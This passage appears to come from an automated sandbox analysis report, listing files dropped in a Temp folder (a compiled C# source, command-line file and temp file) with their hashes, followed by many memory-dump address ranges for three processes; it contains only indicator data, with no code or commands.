                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\ucizalgw\CSCAD21BAB36FDB4DC18D5946FD8371B78.TMP

                                                                                      Filesize

                                                                                      652B

                                                                                      MD5

                                                                                      70a677a4f63c4dcbce13137217b9cbd0

                                                                                      SHA1

                                                                                      d2018376145e9e2a8d3cdb2bec1475a9a7dc6564

                                                                                      SHA256

                                                                                      a296e94088a0456f2b70ff423a34fb93ce401220f427b3191a00a3ed6d51d3e3

                                                                                      SHA512

                                                                                      b85b131583d0a1942c10087994f573d7ff01aeb0f112a20deb03d6db663992e67d061f55e233000dacfd9fd0d43191da96ff5321719f24796688de1613823195

                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\ucizalgw\ucizalgw.0.cs

                                                                                      Filesize

                                                                                      1004B

                                                                                      MD5

                                                                                      c76055a0388b713a1eabe16130684dc3

                                                                                      SHA1

                                                                                      ee11e84cf41d8a43340f7102e17660072906c402

                                                                                      SHA256

                                                                                      8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                      SHA512

                                                                                      22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                    • \??\c:\Users\Admin\AppData\Local\Temp\ucizalgw\ucizalgw.cmdline

                                                                                      Filesize

                                                                                      607B

                                                                                      MD5

                                                                                      eeb696c91cef00482a7f6f9ace13be36

                                                                                      SHA1

                                                                                      8973be952634d3ee115776e5f5f68732cd00feb2

                                                                                      SHA256

                                                                                      d6d049164e28a6a44c12f3783bda2760bfd5c014bbe27fd697583344f1260b9d

                                                                                      SHA512

                                                                                      d7c65cf7caa2fcd3e12b3252b9c9e4864fe732a9192b8988df5acd654fd316e1ffaaaaf6475a3f623304621ee6f30afea70d9b929ac57ced5f4083ad99b7d8f1

                                                                                    • memory/1036-94-0x00007FFB48AD0000-0x00007FFB49591000-memory.dmp

                                                                                      Filesize

                                                                                      10.8MB

                                                                                    • memory/1036-81-0x00007FFB48AD3000-0x00007FFB48AD5000-memory.dmp

                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/1036-93-0x00007FFB48AD0000-0x00007FFB49591000-memory.dmp

                                                                                      Filesize

                                                                                      10.8MB

                                                                                    • memory/1036-107-0x00007FFB48AD0000-0x00007FFB49591000-memory.dmp

                                                                                      Filesize

                                                                                      10.8MB

                                                                                    • memory/1036-82-0x00000258606F0000-0x0000025860712000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/1152-208-0x000002212AA10000-0x000002212AA18000-memory.dmp

                                                                                      Filesize

                                                                                      32KB

                                                                                    • memory/4012-56-0x00007FFB5F150000-0x00007FFB5F165000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/4012-76-0x00007FFB5CC40000-0x00007FFB5CC4D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/4012-80-0x00007FFB5F150000-0x00007FFB5F165000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/4012-30-0x00007FFB5F220000-0x00007FFB5F245000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/4012-124-0x00007FFB58E80000-0x00007FFB58FF7000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/4012-78-0x00007FFB5E1D0000-0x00007FFB5E1FD000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/4012-79-0x00007FFB495A0000-0x00007FFB496BB000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/4012-70-0x00007FFB49BF0000-0x00007FFB4A2C0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/4012-71-0x00007FFB60C70000-0x00007FFB60C7D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/4012-276-0x00007FFB59BB0000-0x00007FFB59C7D000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/4012-278-0x00007FFB59C80000-0x00007FFB59CB3000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/4012-72-0x00007FFB59BB0000-0x00007FFB59C7D000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/4012-73-0x00007FFB59C80000-0x00007FFB59CB3000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/4012-74-0x00007FFB5F220000-0x00007FFB5F245000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/4012-66-0x00007FFB5CDF0000-0x00007FFB5CE09000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/4012-48-0x00007FFB60C80000-0x00007FFB60C8F000-memory.dmp

                                                                                      Filesize

                                                                                      60KB

                                                                                    • memory/4012-60-0x00007FFB5CE10000-0x00007FFB5CE29000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/4012-62-0x00007FFB5CC50000-0x00007FFB5CC74000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/4012-58-0x00007FFB496C0000-0x00007FFB49BE2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/4012-111-0x00007FFB5CC50000-0x00007FFB5CC74000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/4012-344-0x00007FFB5CC40000-0x00007FFB5CC4D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/4012-83-0x00007FFB496C0000-0x00007FFB49BE2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/4012-64-0x00007FFB58E80000-0x00007FFB58FF7000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/4012-25-0x00007FFB49BF0000-0x00007FFB4A2C0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/4012-321-0x00007FFB496C0000-0x00007FFB49BE2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/4012-324-0x00007FFB58E80000-0x00007FFB58FF7000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/4012-316-0x00007FFB49BF0000-0x00007FFB4A2C0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB

                                                                                    • memory/4012-317-0x00007FFB5F220000-0x00007FFB5F245000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/4012-346-0x00007FFB59C80000-0x00007FFB59CB3000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/4012-350-0x00007FFB5F150000-0x00007FFB5F165000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/4012-357-0x00007FFB59BB0000-0x00007FFB59C7D000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/4012-356-0x00007FFB60C70000-0x00007FFB60C7D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/4012-355-0x00007FFB5CDF0000-0x00007FFB5CE09000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/4012-354-0x00007FFB58E80000-0x00007FFB58FF7000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/4012-353-0x00007FFB5CC50000-0x00007FFB5CC74000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/4012-352-0x00007FFB5CE10000-0x00007FFB5CE29000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/4012-351-0x00007FFB496C0000-0x00007FFB49BE2000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/4012-349-0x00007FFB5E1D0000-0x00007FFB5E1FD000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/4012-348-0x00007FFB60C80000-0x00007FFB60C8F000-memory.dmp

                                                                                      Filesize

                                                                                      60KB

                                                                                    • memory/4012-347-0x00007FFB5F220000-0x00007FFB5F245000-memory.dmp

                                                                                      Filesize

                                                                                      148KB

                                                                                    • memory/4012-345-0x00007FFB495A0000-0x00007FFB496BB000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/4012-54-0x00007FFB5E1D0000-0x00007FFB5E1FD000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/4012-331-0x00007FFB49BF0000-0x00007FFB4A2C0000-memory.dmp

                                                                                      Filesize

                                                                                      6.8MB